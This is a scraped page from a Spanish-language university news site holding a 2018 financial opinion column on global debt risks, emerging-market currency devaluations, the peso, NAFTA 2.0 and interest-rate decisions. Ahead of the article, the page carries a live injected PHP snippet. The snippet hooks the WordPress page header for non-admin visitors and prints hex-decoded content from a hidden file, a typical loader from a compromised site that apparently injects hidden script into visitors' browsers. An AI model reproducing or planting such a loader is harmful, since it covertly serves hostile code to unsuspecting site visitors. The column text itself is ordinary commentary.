if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } MI OPINIÓN FINANCIERA DE HOY  – La Opinión Universitaria La Opinión Universitaria
Menu

MI OPINIÓN FINANCIERA DE HOY 

ARMANDO VALERDI

avalerdir@hotmail.com

Al comportamiento de las variables económicas, en sentido coloquial las denominamos como nubes, nubes que en el horizonte económico y financiero pueden convertirse en tormentas, algunas de ellas perfectas, al unirse varias de ellas y producir caos y crisis en la mayoría de las veces no previstas, debido al exceso de confianza o al ignorar sus posibles efectos, por lo que es importante mantener nuestra atención sobre el comportamiento de las variables macroeconómicas, ya que son ellas las que nos indicarán cuando nuestra economía muestre signos de debilitación o de vulnerabilidad ante los efectos geopolíticos externos y repercutir en nuestra planeación financiera con impacto a nuestro patrimonio.

Por lo pronto hay que seguir de cerca lo que algunos expertos analistas nos dicen, como el caso de Mc-Kinsey Global Institute, que nos previene de los tres riesgos que provocaron la crisis financiera de 2008, la más grande desde el crack bursátil de 1929, y que según Mc-Kinsey Global Institute, están de regreso. De acuerdo con la firma, la deuda global es creciente, los hogares han cambiado la deuda hipotecaria por créditos automotrices o de estudios, y la banca está más capitalizada pero es menos rentable; son los tres focos de alerta sobre riesgos en la escena financiera.

No obstante, Mc-Kinsey Global Institute en un reporte menciona, que dos factores ayudan a estabilizar, por el momento, la situación: la actividad financiera internacional muy restringida, así como una reducción de los desbalances globales entre países.

Por otro lado Jean Raby, CEO de Natixis IM, también nos hace ver algunas tormentas, en donde apunta que economía mundial se está dirigiendo al final de un periodo de expansión y se desacelerará entre 2019 y 2021, con riesgos de que entre en recesión, si los desequilibrios que hay en el mundo no se atajan con prontitud y con las políticas económicas adecuadas. “Podemos ver entre el 2019-2021 un periodo en que los fundamentales se van a desacelerar, pero esto no significa que la recesión vendrá mañana o en seis meses, pero si no se actúa llegará más pronto”, mencionó Raby.

Dentro de este contexto hay que seguir de cerca la ola de devaluaciones de monedas emergentes, que para muchos, seguirá siendo una constante, pero poco a poco los grandes portafolios globales comienzan a diferenciarlas.

Sin duda hasta el momento las monedas que han tenido una seria depreciación son la lira turca y el peso argentino, y en espera de sufrir serios daños se encuentran el real brasileño y al rand sudafricano. Por su parte, el tipo de cambio en México ha repuntado en las últimas dos semanas: en el mercado Forex pasó de 18.61 pesos por dólar el 27 de agosto a un techo de 19.68 en la madrugada del 5 de septiembre, y el pasado domingo se muestra por arriba de los 19 pesos, derivado precisamente por la incertidumbre global, que le pega a los mercado emergentes y provoca un «fly to quality». Además de la incertidumbre local por saber qué fue lo que negoció y accedió México en el TLCAN 2.0, así como por lo que pueda presentar López Obrador como Presupuesto 2019, después de haber prometido tantas cosas.

Pero bueno, regresemos al analisis de la mini burbuja de divisas que parece que aún tiene para inflarse un poco más; en lo que se refiere a países como Turquía, Argentina y Brasil todavía se espera que su crisis económica aumente y repercuta en algún contagio a nivel mundial.

Por otro lado en el TLCAN2.0., la negociación de Canadá con Estados Unidos para subirse al TLCAN2.0 sigue generándole ruido al peso, y sin duda el resultado afectara su cotización.

También tenemos que en los próximos días, el 26 de septiembre próximo, la Fed va a subir su tasa 25 puntos base y, a la siguiente semana el 4 de octubre, Banxico la va a dejar en 7.75 %, esto es sin duda un signo positivo, porque mantiene la tasa una sana distancia para considere entre los inversionistas como positivo y además no contribuye en el debilitamiento que la economía mexicana está mostrando recientemente.

Con respecto a la economía estadounidense, los indicadores siguen arrojando señales contundentes de un sobrecalentamiento y un mayor déficit fiscal, esto con las medidas que está tomando Donald Trump, podría llevar a que el ciclo económico de Estados Unidos reaparezca, y eso nos llevaría a lo que algunos expertos nos señalan como inicio de la disminución económica estadounidense, por lo que no hay que dejar de lado el comentario de Gillian Tett, “Si nos fijamos en cómo han evolucionado las finanzas, hay al menos cinco resultados totalmente imprevistos tras la narrativa de los días de pánico del 2008 después del colapso de Lehman Brothers. Comienza con el tema de la deuda. Hace diez años, los inversores y las instituciones financieras volvieron a aprender que el exceso de apalancamiento puede ser peligroso. Por lo tanto, parecía natural pensar que la deuda disminuiría, ya que los acreedores y prestamistas afectados estaban atemorizados. No fue así.

Como podemos ver la economía global nos muestra una gran incertidumbre, llena de indefiniciones y propuestas claras que nos lleven a pensar que el camino perdido sigue, por lo que es importante estar atento a los acontecimientos de las variables económicas que nos muestren las nubes de tormenta que debemos atender.

 

Gracias

 

 

 

 

 

No comments

Deja una respuesta

Tweets recientes